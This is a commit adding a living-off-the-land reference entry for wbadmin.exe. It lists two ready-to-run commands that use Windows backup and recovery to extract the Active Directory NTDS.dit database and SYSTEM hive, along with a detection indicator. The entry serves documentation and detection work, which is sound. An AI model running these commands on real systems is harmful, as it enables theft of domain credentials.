Create wbadmin (#364)

Co-authored-by: Wietze <wietze@users.noreply.github.com>

yml/OSBinaries/Wbadmin.yml

@@ -0,0 +1,26 @@
+---
+Name: wbadmin.exe
+Description: Windows Backup Administration utility
+Author: Chris Eastwood
+Created: 2024-04-05
+Commands:
+  - Command: wbadmin start backup -backupTarget:C:\temp\ -include:C:\Windows\NTDS\NTDS.dit,C:\Windows\System32\config\SYSTEM -quiet
+    Description: Extract NTDS.dit and SYSTEM hive into backup virtual hard drive file (.vhdx)
+    Usecase: Snapshoting of Active Directory NTDS.dit database
+    Category: Dump
+    Privileges: Administrator, Backup Operators, SeBackupPrivilege
+    MitreID: T1003.003
+    OperatingSystem: Windows Server
+  - Command: wbadmin start recovery -version:<VERSIONIDENTIFIER> -recoverytarget:C:\temp -itemtype:file -items:C:\Windows\NTDS\NTDS.dit,C:\Windows\System32\config\SYSTEM -notRestoreAcl -quiet
+    Description: Restore a version of NTDS.dit and SYSTEM hive into file path. The command `wbadmin get versions` can be used to find version identifiers.
+    Usecase: Dumping of Active Directory NTDS.dit database
+    Category: Dump
+    Privileges: Administrator, Backup Operators, SeBackupPrivilege
+    MitreID: T1003.003
+    OperatingSystem: Windows Server
+Full_Path:
+  - Path: C:\Windows\System32\wbadmin.exe
+Detection:
+  - IOC: wbadmin.exe command lines containing "NTDS" or "NTDS.dit"
+Resources:
+  - Link: https://medium.com/r3d-buck3t/windows-privesc-with-sebackupprivilege-65d2cd1eb960